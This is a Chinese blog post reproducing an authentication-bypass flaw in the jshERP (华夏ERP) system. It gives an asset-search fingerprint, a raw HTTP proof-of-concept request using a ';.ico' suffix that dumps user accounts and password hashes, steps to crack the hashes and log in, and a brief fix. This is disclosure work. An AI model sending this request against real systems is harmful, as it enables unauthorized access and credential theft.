华夏ERP getAllList;.ico敏感信息泄露漏洞

已于 2023-12-22 14:30:26 修改
阅读量736 收藏 7
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-22 14:28:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135152304
版权

漏洞描述

华夏ERP是基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,可以获取到系统的账号密码。

资产测绘

body=“jshERP-boot”

漏洞影响

开源ERP系统jshERP所有版本
在这里插入图片描述

漏洞复现

POC:

GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

在这里插入图片描述
将password的值进行md5解密为明文,即可登录
在这里插入图片描述
在这里插入图片描述

修复建议

对相关接口进行限制访问、鉴权。

keepb1ue
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
华夏ERP getAllList信息泄露漏洞复现(CVE-2024-0490)
0xSec
01-16 1416
华夏ERP 系统中存在一个问题,被评定为有问题的。该问题影响了文件/user/getAllList的某些未知处理过程。未经身份验证的攻击者可以利用此问题获取后台用户名密码列表。可导致后台被控,漏洞已被公开披露,可能被利用。
华夏ERP存在泄露用户名和密码敏感漏洞(CNVD-2020-63964)
失心少年
06-19 714
华夏ERP基于SpringBoot框架、SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。
[漏洞复现]华夏erp账号密码泄露
qq_17754023的博客
06-22 1142
描述华夏 ERP 是一个基于SpringBoot框架和 SaaS模式的系统。华夏 ERP 存在帐号密码泄露漏洞,攻击者可利用该漏洞获取系统所有账号密码从而登录系统进行恶意攻击。目前官方暂未发布安全版本修复此漏洞,建议联系厂商获取加固建议。fofa语法:"jshERP-boot"
华夏ERP存在泄露用户名和密码敏感漏洞复现
m0_49025459的博客
07-18 549
密码是MD5加密的,我们只需要正常的去解密,然后输入账号密码即可。
华夏账号密码信息泄露漏洞-漏洞复现
weixin_43167326的博客
01-20 458
jshERP立志为中小企业提供开源好用的。
jshERP开源进销存软件
07-07
jshERP完整开源版J2EE代码 很多人说jshERP是目前唯一完整开源的进销存系统 虽然目前只有进销存+财务的功能,但后面将会推出ERP的全部功能,大家一起努力吧 系统部署初始账号:jsh,密码:123456,部署如有问题请联系 源码托管地址:https://git.oschina.net/jishenghua/JSH_ERP 开发初衷 jshERP立志为中小企业提供免费好用的ERP软件,降低企业的信息化成本 个人开发者也可以使用jshERP进行二次开发,承接外包ERP项目 初学JAVA的小伙伴可以下载源代码来进行学习交流 技术框架 核心框架:Spring Framework 3.0.5 视图框架:Struts 2.2.3 持久层框架:Hibernate 3.0 日志管理:Log4j 1.2.16 JS框架:Jquery 1.8.0 UI框架: EasyUI 1.3.5 桌面框架: HoorayOS 项目管理框架: Maven3.2.3 开发环境 建议开发者使用以下环境,可以避免版本带来的问题 IDE: MyEclipse8.5+/Eclipse4.4+ DB: Mysql5.1 JDK: JDK1.6+ WEB: Tomcat6.0+ Maven: Maven3.2.3+ 为方便大家搭建开发环境,分享了下载地址 http://pan.baidu.com/s/1nuKnlNV 运行环境 WEB服务器:Tomcat6.0+ 数据库服务器:Mysql5.1 JAVA平台: JRE1.6+ 操作系统:Windows、Linux等 开源说明 本系统100%开源,遵守Apache2.0协议
天强绩效考核系统开发命名规范标准.doc
10-21
- 同样遵循Pascal Casing,使用动词或动词短语,如`GetAllList()`,Data层方法统一使用此规则,不使用下划线。 4. **属性的命名**: - 使用Pascal Casing,名词或名词短语,不使用下划线,可以考虑用类型名作为...
详解ABP框架中的数据过滤器与数据传输对象的用法_.docx
10-10
通过DTO,开发者可以控制哪些数据暴露给客户端,防止敏感信息的泄漏。同时,DTO也可以用于映射和转换,使得服务层可以处理复杂的业务逻辑,而视图层专注于展示和交互。 总结来说,ABP框架的数据过滤器和数据传输...
C# DataGridView绑定数据源的方法
08-26
IList<student> sList = StudentDB.GetAllList(); DataGridView.DataSource = sList; ``` 在上面的代码中,我们使用List来存储数据,并将其绑定至DataGridView控件。 复杂数据绑定是将一个以列表为基础的用户控件...
华夏ERP_v2.3.1最新版SQL与RCE的审计过程1
08-03
前言认证绕过华夏ERP_v2.3.1最新版SQL与RCE的审计过程1.6. public class LogCostFilter implements Filt
Redis缓存,泛型集合与json字符串的相互转换实例
10-15
list = userService.getAllList(); redisTemplate.opsForValue().set(key, JSON.toJSONString(list), 60 * 1, TimeUnit.SECONDS); } return list; } ``` 这里,`opsForValue().get()`用于获取Redis中的值,如果...
「Java代码审计」华夏ERP3.0代码审计
qq_50854662的博客
10-13 778
「Java代码审计」华夏ERP3.0代码审计
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 798
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 479
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 560
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 638
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
最新发布
sdexcel的专栏
07-19 936
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
org.apache.ibatis.binding.BindingException: Invalid bound statement (not found): Mapper.getAllList
12-16
这个异常信息表明在MyBatis中找不到名为Mapper.getAllList的语句。这可能是由于以下原因导致的: 1. Mapper.xml文件中没有定义id为getAllList的语句。 2. Mapper.xml文件中定义了id为getAllList的语句,但是在Mapper接口中没有对应的方法。 3. Mapper接口中定义了名为getAllList的方法,但是方法名和Mapper.xml文件中定义的id不一致。 解决方法: 1. 检查Mapper.xml文件中是否定义了id为getAllList的语句。 2. 检查Mapper接口中是否定义了名为getAllList的方法。 3. 确保Mapper接口中定义的方法名和Mapper.xml文件中定义的id一致。 以下是一个可能的解决方案: 在Mapper.xml文件中添加id为getAllList的语句: ```xml <select id="getAllList" resultType="com.example.demo.entity.User"> select * from user </select> ``` 在Mapper接口中添加名为getAllList的方法: ```java public interface UserMapper { List<User> getAllList(); } ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值